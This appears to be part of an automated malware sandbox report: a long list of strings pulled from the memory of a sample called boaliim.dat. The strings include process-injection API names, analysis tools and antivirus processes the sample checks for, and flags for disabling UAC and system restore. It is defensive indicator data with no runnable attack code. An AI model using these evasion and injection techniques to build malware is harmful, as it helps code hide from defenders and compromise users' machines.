Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sessionidonbitmapbitsionoldocessid;dword threadid
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpeyeem
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpeyets
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tcpeye.exee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif.
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c70ae2a444794b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b8u
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b8r
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c718eeba446d7339879deb2540927991o
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c71deeb25541!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c708eba95741
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: errorc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c700f2a5527d601aa0bce12357886fbb4fg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cf2de6a45c41|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c71deeb255777417aa96ec3c7c6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c70ae6bc5141t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da0fe3ac427d61269fq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cf2de6a45c41n
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: error
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ntdll.dll
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cf2de6a45c41f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssssss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssssss5
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: binbufferetdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: colitems
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: usbrn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssssss[
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: objantivirusproductp
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disablerm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: powershelle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: error'
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antivirus
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssssssb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: binbuffer4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bufferasm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bufferasmetdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellz
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssssssw
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cf2de6a45c41l
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssssss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ssssss&
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exesd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: process explorera
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: smartsniff
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wireshark;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wireshark
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antianalysis
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp64.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: process hackery
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: process hackerv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: taskmgr.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: process explorer
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processhacker.exe%
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: taskmgr.exesr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ptrtructcreatea5527d6d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cf2de6a45c41m
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kernel32.dllef5a7537d6v
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c71deeb25541`
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cf2de6a45c41i
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ntunmapviewofsectiond6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cf2de6a45c417
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sexemodule61ef5a7537d68
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: byte[uctcreate!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: asmrylende0fe3ac427d6*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: byte[uctcreateb255777
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: virtualallocex
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: word[uctcreate
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dword_ptrc61ef5a7537d6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: virtualallocex9ba597d6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kernel32.dll7ca89775d4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avastui.exeixreloc8b1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: binaryen
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: user32.dllv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ndowprocw_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _crypt_derivekey@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_dllhandlesetadr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exefcountdec//6{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_dllhandle|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _crypt_decryptdataa326e
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: colitems8d3c7a7e851e87
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgsvc.exe///6b//65//7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: binbufferetptr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sexemodule3
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: objantivirusproducte8e4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountnd ad=
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_fixreloc ad&
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disablesysrestore/
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: execquery
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bufferasmetptr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sssssseplace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: displayname
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountdecere
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: egui.exerivekeyand ad
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avastsvc.exextset
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gdisharedhandletablee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y08644747068671a053e
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3499bfda1b69b8cj
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @exitmethoden0
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @exitmethodpo
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antianalysis!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _reversep,
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disableuac
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @exitcode
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antitask`+
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: xcountcharso
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fillattributer
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eghgwwhcc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: osminorversion1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reserved?
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ycountchars
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: showwindow(
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rgsvcs.ex t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antivirusntext
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _reversebs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: execute_vbs_vm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ikvvfncnn.bmp
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_path
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: logmaker
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: anti_botkillvm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: persistenceq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: emulator_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _stringbetweenb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_contexte
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _crypt_startuph
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antitasks
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disablersv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e5ej
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shimlt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5*20c39e26/304/6/3052_4f0*2_d30_2_d70c2_e///05/75f2d/50920fd43039//e6266e20444f53206d6f64652e0d0d0*24
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0\shjgtph.kmt4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: criticalsectiontimeout;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tlsexpansionbitmap<
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fastpebunlockroutine%
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberofrvaandsizes.
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kernelcallbacktableut
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tlsexpansioncounter
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapsegmentreservee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapsegmentreserve
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapsegmentcommittat
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: extendedregistersps
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: maximumnumberofheaps
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizeofheapreserve
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processstarterhelper
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: postprocessinitroutine
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcharacteristics
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: writeprocessmemoryut
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizeofstackcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizeofheapcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagebaseaddresse
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: environmentupdatecount
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: heapsegmentcommit
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: criticalsectiontimeout
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizeofstackreserver
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gdisharedhandletablez
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tlsexpansionbitmapbitsc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gdidcattributelistd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inheritedaddressspacem
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processparametersnetv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fastpeblockroutinee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ansicodepagedatacount`
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: unicodecasetabledatai
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: extendedregisters
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ansicodepagedataons
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: unicodecasetabledataon
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inheritedaddressspace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_contextset41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: majorlinkerversion5-21-7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: minorlinkerversionmver8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\syswow64!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef20f3a169*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disablesysrestoreatae
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizeofoptionalheader
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountinc41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720edab4441
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountdec41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: addressofnewexeheader
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_fixreloc41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pointertorawdatans
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pointertorelocationsa
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pointertolinenumbersta
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberofrelocationsa
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9da1ec28a691
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_dllhandlesetn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imagebaseaddress25541
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberofsections
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tlsexpansioncounter41
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: numberoflinenumbersv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _crypt_decryptdataeph_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pointertosymboltable@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fastpeblockroutinephi
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __crypt_refcountssr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: addressofentrypoint{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sectionalignment|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: minorsubsystemversione
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: majorsubsystemversionn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sizeofuninitializeddata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: win32versionvalue
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: minorimageversion
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: majorimageversionm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201\^
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ca0024d60201\comctl32.dllt
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: en-us
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c703e6af597b4bin.sdb
